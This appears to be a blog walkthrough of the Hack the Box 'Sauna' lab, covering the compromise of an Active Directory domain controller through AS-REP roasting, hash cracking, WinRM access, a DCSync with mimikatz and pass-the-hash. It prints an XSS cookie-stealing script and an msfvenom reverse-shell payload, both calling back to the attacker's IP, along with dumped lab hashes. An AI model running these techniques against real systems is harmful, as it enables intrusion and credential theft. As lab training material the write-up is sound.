opcode

Hack the Box - Sauna

18.07.2020 — HTB, CTF — 5 min read

Summary

HTB challenges don't always feel realistic, but this one did a good job of presenting challenges and vulnerabilities you see in the real world. It also reminded me of some important concepts, both in offense and defense. Thanks to @WhortonMr for the fun box.

Enumeration

I start with a full port nmap scan, but this estimates another 5 hours to complete.

1SYN Stealth Scan Timing: About 1.79% done; ETC: 04:34 (5:19:56 remaining)

So I cancel and run a top 1000 ports scan to reduce the time. This gives me a lot to work with.

1root@kali:/home/kali/htb/sauna# nmap -sC -sV --top-ports 1000 -oN nmap_top_1000 10.10.10.175
2Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-08 23:16 EDT
3Nmap scan report for 10.10.10.175
4Host is up (0.057s latency).
5Not shown: 988 filtered ports
6PORT     STATE SERVICE       VERSION
753/tcp   open  domain?
880/tcp   open  http          Microsoft IIS httpd 10.0
9| http-methods: 
10|_  Potentially risky methods: TRACE
11|_http-server-header: Microsoft-IIS/10.0
12|_http-title: Egotistical Bank :: Home
1388/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-07-09 10:21:12Z)
14135/tcp  open  msrpc         Microsoft Windows RPC
15139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
16389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
17445/tcp  open  microsoft-ds?
18464/tcp  open  kpasswd5?
19593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
20636/tcp  open  tcpwrapped
213268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
223269/tcp open  tcpwrapped
23Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
24
25Host script results:
26|_clock-skew: 7h04m48s
27| smb2-security-mode: 
28|   2.02: 
29|_    Message signing enabled and required
30| smb2-time: 
31|   date: 2020-07-09T10:23:30
32|_  start_date: N/A
33
34Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
35Nmap done: 1 IP address (1 host up) scanned in 309.50 seconds

I re-run my full scan in the background, because you never know when a port might be hidden at the top end of the spectrum. Now that it's running, I start working through the ports.

53 - DNS

I try a quick nslookup to see if it gives up any nameservers.

1root@kali:/home/kali# nslookup
2> server 127.0.0.1
3Default server: 127.0.0.1
4Address: 127.0.0.1#53
5> server 10.10.10.175
6Default server: 10.10.10.175
7Address: 10.10.10.175#53
8> 10.10.10.175
9** server can't find 175.10.10.10.in-addr.arpa: SERVFAIL

I add sauna.htb to my /etc/hosts.

110.10.10.175    sauna.htb

I try a quick zone transfer to see if it responds with any records.

1root@kali:/home/kali# dig axfr sauna.htb @10.10.10.175
2
3; <<>> DiG 9.16.4-Debian <<>> axfr sauna.htb @10.10.10.175
4;; global options: +cmd
5; Transfer failed.

I try a few other things, and no luck so I move on.

80 - HTTP

Whatweb identifies the HTTP server as IIS 10, the site was made with Bootstrap.

1root@kali:/home/kali/htb/sauna# whatweb 10.10.10.175
2http://10.10.10.175 [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[example@email.com,info@example.com], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.10.175], Microsoft-IIS[10.0], Script, Title[Egotistical Bank :: Home]

The main page reveals it's a bank.

I turn on BurpSuite in the background as I click around the different pages. There's an about page with full names of the team members. This might come in handy later.

There's a contact page with a form.

I try a quick XSS on each field, with a script source requesting back to a netcat listener on my machine.

1root@kali:/home/kali/htb/sauna/# nc -nvlp 80

The email field tries to validate and fails. I remove it and re-run, and get the following error message.

I remove all the XSS and try regular strings, and get the same response. I check Burp, and no request is shown. I open Firefox dev tools, and see a POST is being used.

I click 'edit and resend', modify the request method to be GET, and get a 200.

Burp captures this request now, so I send it to repeater, highlight the script tags and use Ctrl-U to encode the requests.

I wait a little while and don't receive a connection back. I try one more trick with a cookie grabber, and repeat the encoding process with Ctrl-U.

1<script>new Image().src="http://10.10.14.8/fake.jpg?output="+document.cookie;</script>

Nothing that time either, so time to move on. I do a quick enumeration with dirsearch.py to look for any hidden folders. I don't get anything I didn't see with Burp.

Port 88 - Kerberos

I try an nmap script to enumerate some users.

1nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='sauna.htb',userdb=/usr/share/seclists/Usernames/Names/names.txt sauna.htb

No luck here either.

Port 135 - RPC

I try a null auth with rpcclient but access denied

1root@kali:/home/kali# rpcclient 10.10.10.175
2Enter WORKGROUP\root's password: 
3Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Port 445 - SMB

I try smbclient with a null login. Login is successful but no shares available.

1root@kali:/home/kali/htb/sauna# smbclient -L //10.10.10.175
2Enter WORKGROUP\root's password: 
3Anonymous login successful
4
5    Sharename       Type      Comment
6    ---------       ----      -------
7SMB1 disabled -- no workgroup available

I try with crackmapexec and get some useful pieces of information. The name is sauna, the domain is EGOTISTICAL-BANK.local.

1root@kali:/home/kali# crackmapexec smb sauna.htb --shares
2SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
3SMB         10.10.10.175    445    SAUNA            [-] Error enumerating shares: SMB SessionError: STATUS_USER_SESSION_DELETED(The remote user session has been deleted.)

I update my /etc/hosts to reflect this new information.

110.10.10.175    sauna.EGOTISTICAL-BANK.local
210.10.10.175    EGOTISTICAL-BANK.LOCAL

Re-running some of the commands I ran before with the correct domain returns a little more info.

1root@kali:/home/kali# nmap -p 389 --script ldap-search EGOTISTICAL-BANK.local
2Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-09 00:31 EDT
3Nmap scan report for EGOTISTICAL-BANK.local (10.10.10.175)
4Host is up (0.055s latency).
5rDNS record for 10.10.10.175: sauna.EGOTISTICAL-BANK.local
6
7PORT    STATE SERVICE
8389/tcp open  ldap
9| ldap-search: 
10|   Context: DC=EGOTISTICAL-BANK,DC=LOCAL
11|     dn: DC=EGOTISTICAL-BANK,DC=LOCAL
12|         objectClass: top
13|         objectClass: domain
14|         objectClass: domainDNS
15|         distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
16|         instanceType: 5
17|         whenCreated: 2020/01/23 05:44:25 UTC
18|         whenChanged: 2020/07/09 10:14:31 UTC
19|         subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
20|         subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
21|         subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
22|         uSNCreated: 4099
23|         dSASignature: \x01\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\xBE\xE0\xB3\xC6%\xECD\xB2\xB9\x9F\xF8\D\xB2\xEC
24|         uSNChanged: 57366
25|         name: EGOTISTICAL-BANK
26...
27|     dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
28|     dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
29|     dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
30|     dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
31|     dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
32|     dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
33|     dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
34|     dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
35|     dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
36|     dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
37|     dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
38|     dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
39|     dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
40|_    dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
41
42Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds

Nothing super useful, but the minimum password length is 7, and there is an object called "Hugo Smith".

Exploitation Part 1

I'm coming up short on enumeration, so I have to stop and step back for a second and think about what the most interesting things I've found are.

Some forms that seem to filtered pretty heavily, with POST methods that fail.
A list of employees.

I put together a list of the users found on the 'About Us' page, and type some variations that are common, then save it to a text file.

1fergus
2fergus.smith
3fergussmith
4fsmith
5hugo
6hugo.bear
7hugobear
8hbear
9steven
10steven.kerb
11stevenkerb
12shaun
13shaun.coins
14shauncoins
15scoins
16bowie
17bowie.taylor
18bowietaylor
19btaylor
20sophie
21sophie.driver
22sophiedriver
23sdriver

There are only a few things I can try without having to brute force each one. From a previous box on HTB I completed, Forest, I learned about GetNPUsers.py from the Impacket examples library.

1root@kali:/home/kali/htb/sauna# GetNPUsers.py EGOTISTICALBANK/ -no-pass -usersfile users.txt -dc-ip 10.10.10.175
2Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
3
4[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
5[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
6[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
7$krb5asrep$23$fsmith@EGOTISTICALBANK:21309fe9bed91587b8c205465ded379f$0d75a1210adc57c73dafd140f6538d812461751e6264782909e7b4f096c82bb350e4113966a2aacf92a3ddbc1b2d268f38e5713843e17fb294e4642b04c02b0b8ca97696c4bb6e007c3328592f6402d1c9bdf597c07926b0f0a5dbfb09855b040f53c4a978ab2edd76e691fac3d172ef2375b9390030be934f1fa4472de36656a8ba75bde91a06d52117dc112a8dd9ce4ee957e1bd04410045e6b0adf8930bcf0d49c35527882c170410f7f64cb9c7f1c9205d386cd64deee4cc144c7c545ce9622b509a9969d3661ec79e48a7025cefbead42a6e10b7737b5d2df6872fb960dc8235ed966d5701a092c7aca24fda3a6c465060bcfc17c730b
8[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
9[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

I've got a hash. What just happened?

GetNPUsers.py requests accounts from Kerberos that have Pre-Authentication disabled. A good explanation is here:

https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

The TLDR version is, the first step in Kerberos authentication is Pre-Authentication. This is the point where the user enters their password, and it is sent to the Domain Controller for verification etc.

Pre-authentication is enabled by default for all accounts, but you can turn it off if you want to. There are architectural reasons for doing this, but not a good idea. If you can grab one of those hashes, you can try to crack it with hashcat.

1kali@wallaby:~/$ hashcat -m 18200 /home/kali/hashes/sauna.hash /usr/share/wordlists/rockyou.txt
2
3$krb5asrep$23$fsmith@EGOTISTICALBANK:21309fe9bed91587b8c205465ded379f$0d75a1210adc57c73dafd140f6538d812461751e6264782909e7b4f096c82bb350e4113966a2aacf92a3ddbc1b2d268f38e5713843e17fb294e4642b04c02b0b8ca97696c4bb6e007c3328592f6402d1c9bdf597c07926b0f0a5dbfb09855b040f53c4a978ab2edd76e691fac3d172ef2375b9390030be934f1fa4472de36656a8ba75bde91a06d52117dc112a8dd9ce4ee957e1bd04410045e6b0adf8930bcf0d49c35527882c170410f7f64cb9c7f1c9205d386cd64deee4cc144c7c545ce9622b509a9969d3661ec79e48a7025cefbead42a6e10b7737b5d2df6872fb960dc8235ed966d5701a092c7aca24fda3a6c465060bcfc17c730b:Thestrokes23
4                                                 
5Session..........: hashcat
6Status...........: Cracked
7Hash.Type........: Kerberos 5 AS-REP etype 23
8Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICALBANK:21309fe9bed915...7c730b
9Time.Started.....: Wed Jul  8 23:12:04 2020 (1 sec)
10Time.Estimated...: Wed Jul  8 23:12:05 2020 (0 secs)
11Guess.Base.......: File (/home/brandon/wordlists/rockyou.txt)
12Guess.Queue......: 1/1 (100.00%)
13Speed.#1.........:  9215.4 kH/s (7.20ms) @ Accel:512 Loops:1 Thr:64 Vec:1
14Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
15Progress.........: 10616832/14344385 (74.01%)
16Rejected.........: 0/10616832 (0.00%)
17Restore.Point....: 10321920/14344385 (71.96%)
18Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
19Candidates.#1....: ahki_22 -> Saboka54
20Hardware.Mon.#1..: Temp: 60c Fan: 28% Util: 35% Core:1797MHz Mem:4006MHz Bus:8

user: fsmith

pass: Thestrokes23

Now to figure out what to do with these creds. I try two handy static binaries of the Impacket library smbexec.py and psexec.py , but no luck.

https://github.com/ropnop/impacket_static_binaries

1root@kali:/home/kali/htb/sauna# psexec.py fsmith@EGOTISTICAL-BANK.local
2Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
3
4Password:
5[*] Requesting shares on EGOTISTICAL-BANK.local.....
6[-] share 'ADMIN$' is not writable.
7[-] share 'C$' is not writable.
8[-] share 'NETLOGON' is not writable.
9[-] share 'print$' is not writable.
10[-] share 'SYSVOL' is not writable.
11root@kali:/home/kali/htb/sauna# smbexec.py fsmith@EGOTISTICAL-BANK.local
12Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
13
14Password:
15[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

Luckily, as I'm scratching my head, my full port nmap scan comes back. There is an interesting port, but you wouldn't know because nmap misidentifies it half of the time.

15985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
2|_http-server-header: Microsoft-HTTPAPI/2.0
3|_http-title: Not Found

This port is actually WinRM, a remote management service that can use Powershell. There is a great tool I haven't used in a while called evil-winrm. It's pretty simple to install on kali.

1root@kali:/home/kali/htb/sauna# gem install evil-winrm

I launch evil-winrm and get a shell.

1root@kali:/home/kali/htb/sauna# evil-winrm -i 10.10.10.175 -u fsmith -p 'Thestrokes23'
2
3Evil-WinRM shell v2.3
4
5Info: Establishing connection to remote endpoint
6
7*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
8egotisticalbank\fsmith

And I get the user flag.

1user.txt
21b5520b98d97cf17f24122a55baf70cf

Exploitation Part 2

To speed up some of the enumeration phase as it's late, I use evil-winrm's built in upload function.

1*Evil-WinRM* PS C:\Users\FSmith\1> upload /opt/win/winPEAS.exe
2Info: Uploading /opt/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe to C:\Users\FSmith\1\winPEAS.exe
3
4                                                             
5Data: 322216 bytes of 322216 bytes copied
6
7Info: Upload successful!

It makes short work of the machine and discovers AutoLogin credentials.

1[+] Looking for AutoLogon credentials(T1012)
2    Some AutoLogon credentials were found!!
3    DefaultDomainName             :  EGOTISTICALBANK
4    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
5    DefaultPassword               :  Moneymakestheworldgoround!

This is good, because based on the naming scheme, this is a service account. Trying a variety of protocols, it seems these credentials are not the current credentials.

However, I list the accounts on the domain.

1C:\Users\FSmith\1>net users /domain
2
3User accounts for \\
4
5-------------------------------------------------------------------------------
6Administrator            FSmith                   Guest                    
7HSmith                   krbtgt                   svc_loanmgr

It looks like the user account has been renamed to svc_loanmgr. I retry with the new user name and it's successful.

1root@kali:/home/kali/htb/sauna# evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
2
3Evil-WinRM shell v2.3
4
5Info: Establishing connection to remote endpoint
6
7*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami /priv
8
9PRIVILEGES INFORMATION
10----------------------
11
12Privilege Name                Description                    State
13============================= ============================== =======
14SeMachineAccountPrivilege     Add workstations to domain     Enabled
15SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
16SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

It looks like we are in a similar boat with privileges to FSmith. I need to repeat my enumeration process with this account to look for anything different. WinPEAS returns nothing new, so now I need to enumerate what I can do with AD.

I could spend hours enumerating by hand, or I can use SharpHound and dump the data to Bloodhound for analysis.

1Evil-WinRM* PS C:\Users\svc_loanmgr\1> upload /opt/BloodHound/Ingestors/SharpHound.exe
2Info: Uploading /opt/BloodHound/Ingestors/SharpHound.exe to C:\Users\svc_loanmgr\1\SharpHound.exe
3
4                                                             
5Data: 1110016 bytes of 1110016 bytes copied
6
7Info: Upload successful!
8
9*Evil-WinRM* PS C:\Users\svc_loanmgr\1> ./SharpHound.exe 
10-----------------------------------------------
11Initializing SharpHound at 4:21 AM on 7/10/2020
12-----------------------------------------------
13
14Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
15
16[+] Creating Schema map for domain EGOTISTICAL-BANK.LOCAL using path CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
17[+] Cache File not Found: 0 Objects in cache
18
19[+] Pre-populating Domain Controller SIDS
20Status: 0 objects finished (+0) -- Using 19 MB RAM
21Status: 60 objects finished (+60 ì)/s -- Using 27 MB RAM
22Enumeration finished in 00:00:00.4067424
23Compressing data to .\20200710042133_BloodHound.zip
24You can upload this file directly to the UI
25
26SharpHound Enumeration Completed at 4:21 AM on 7/10/2020! Happy Graphing!

Then I download the zip with evil-winrm, unpack the files and dump them to Bloodhound. For a good guide to installing and running Bloodhound, check out this guide.

https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux

Selecting the Query 'Find Prinicipals with DCSync Rights,' I find svc_loanmgr has the two privileges necessary to perform a DCSync attack.

Mimikatz is the perfect tool for this, but evil-winrm doesn't handle it too well, so I generate a reverse shell with msfvenom.

1root@kali:/home/kali/htb/sauna# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -f exe -o shell.exe
2[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
3[-] No arch selected, selecting arch: x64 from the payload
4No encoder specified, outputting raw payload
5Payload size: 460 bytes
6Final size of exe file: 7168 bytes
7Saved as: shell.exe

Then I upload it to Sauna and get a reverse shell.

1*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /home/kali/htb/sauna/shell.exe
2Info: Uploading /home/kali/htb/sauna/shell.exe to C:\Users\svc_loanmgr\Documents\shell.exe

1root@kali:/home/kali/htb/sauna# nc -nvlp 443
2listening on [any] 443 ...
3connect to [10.10.14.8] from (UNKNOWN) [10.10.10.175] 57685
4Microsoft Windows [Version 10.0.17763.973]
5(c) 2018 Microsoft Corporation. All rights reserved.
6
7C:\Users\svc_loanmgr\1>

Then I run mimikatz.

1C:\Users\svc_loanmgr\1>mimikatz.exe
2mimikatz.exe
3
4  .#####.   mimikatz 2.1.1 (x86) built on Mar 25 2018 21:00:57
5 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
6 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
7 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
8 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
9  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
10
11mimikatz # lsadump::dcsync /domain:EGOTISTICAL-BANK.local /user:Administrator
12[DC] 'EGOTISTICAL-BANK.local' will be the domain
13[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
14[DC] 'Administrator' will be the user account
15
16Object RDN           : Administrator
17
18** SAM ACCOUNT **
19
20SAM Username         : Administrator
21Account Type         : 30000000 ( USER_OBJECT )
22User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
23Account expiration   : 
24Password last change : 1/24/2020 10:14:15 AM
25Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
26Object Relative ID   : 500
27
28Credentials:
29  Hash NTLM: d9485863c1e9e05851aa40cbb4ab9dff
30    ntlm- 0: d9485863c1e9e05851aa40cbb4ab9dff
31    ntlm- 1: 7facdc498ed1680c4fd1448319a8c04f
32    lm  - 0: ee8c50e6bc332970a8e8a632488f5211
33
34Supplemental Credentials:
35* Primary:NTLM-Strong-NTOWF *
36    Random Value : caab2b641b39e342e0bdfcd150b1683e
37
38* Primary:Kerberos-Newer-Keys *
39    Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
40    Default Iterations : 4096
41    Credentials
42      aes256_hmac       (4096) : 987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
43      aes128_hmac       (4096) : 145e4d0e4a6600b7ec0ece74997651d0
44      des_cbc_md5       (4096) : 19d5f15d689b1ce5
45    OldCredentials
46      aes256_hmac       (4096) : 9637f48fa06f6eea485d26cd297076c5507877df32e4a47497f360106b3c95ef
47      aes128_hmac       (4096) : 52c02b864f61f427d6ed0b22639849df
48      des_cbc_md5       (4096) : d9379d13f7c15d1c
49
50* Primary:Kerberos *
51    Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
52    Credentials
53      des_cbc_md5       : 19d5f15d689b1ce5
54    OldCredentials
55      des_cbc_md5       : d9379d13f7c15d1c
56
57* Packages *
58    NTLM-Strong-NTOWF
59
60* Primary:WDigest *
61    01  3fbea1ff422da035f1dc9b0ce45e84ea
62    02  708091daa9db25abbd1d94246e4257e2
63    03  417f2e40d5be8d436af749ed9fddb0b0
64    04  3fbea1ff422da035f1dc9b0ce45e84ea
65    05  50cb7cfb64edf83218804d934e30d431
66    06  781dbcf7b8f9079382a1948f26f561ee
67    07  4052111530264023a7d445957f5146e6
68    08  8f4bffc5d94cc294272cd0c836e15c47
69    09  0c81bc892ea87f7dd0f4a3a05b51f158
70    10  f8c10a5bd37ea2568976d47ef12e55b9
71    11  8f4bffc5d94cc294272cd0c836e15c47
72    12  023b04503e3eef421de2fcaf8ba1297d
73    13  613839caf0cf709da25991e2e5cb63cf
74    14  16974c015c9905fb27e55a52dc14dfb0
75    15  3c8af7ccd5e9bd131849990d6f18954b
76    16  2b26fb63dcbf03fe68b67cdd2c72b6e6
77    17  6eeda5f64e4adef4c299717eafbd2850
78    18  3b32ec94978feeac76ba92b312114e2c
79    19  b25058bc1ebfcac10605d39f65bff67f
80    20  89e75cc6957728117eb1192e739e5235
81    21  7e6d891c956f186006f07f15719a8a4e
82    22  a2cada693715ecc5725a235d3439e6a2
83    23  79e1db34d98ccd050b493138a3591683
84    24  1f29ace4f232ebce1a60a48a45593205
85    25  9233c8df5a28ee96900cc8b59a731923
86    26  08c02557056f293aab47eccf1186c100
87    27  695caa49e68da1ae78c1523b3442e230
88    28  57d7b68bd2f06eae3ba10ca342e62a78
89    29  3f14bb208435674e6a1cb8a957478c18

Then we can use Impacket's smbexec.py to get a shell.

1root@kali:/home/kali/htb/sauna# smbexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff administrator@EGOTISTICAL-BANK.local
2Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
3
4[!] Launching semi-interactive shell - Careful what you execute
5C:\Windows\system32>whoami
6nt authority\system

Smbexec is a little limiting as far as shell commands you can use, so I kill my reverse shell to port 443, and re-launch my reverse shell to get a proper shell.

1C:\Windows\system32>C:\Users\svc_loanmgr\Documents\shell.exe

1root.txt
2f3ee04965c68257382e31502cc5e881f

Lessons Learned

Defense

Disabling Pre-Authentication on AD accounts is dangerous. Find another way to design your architecture.
Conventional naming schemes are common, so don't list your team member's full names on the website.
Monitor accounts with DCSync privileges for unusual activity.

Offense

Even if you run a limited port scan and find a lot of interesting ports, always go back and run the full port scan.
Sometimes your first assumption is wrong (my assumption it was sauna.htb), so remember what that affected and go back and re-enumerate when that assumption was proven wrong.
Don't spend too much time on rabbit holes, sometimes the answer really is brute-forcing. You might get lucky.
Each time you get an account, re-enumerate.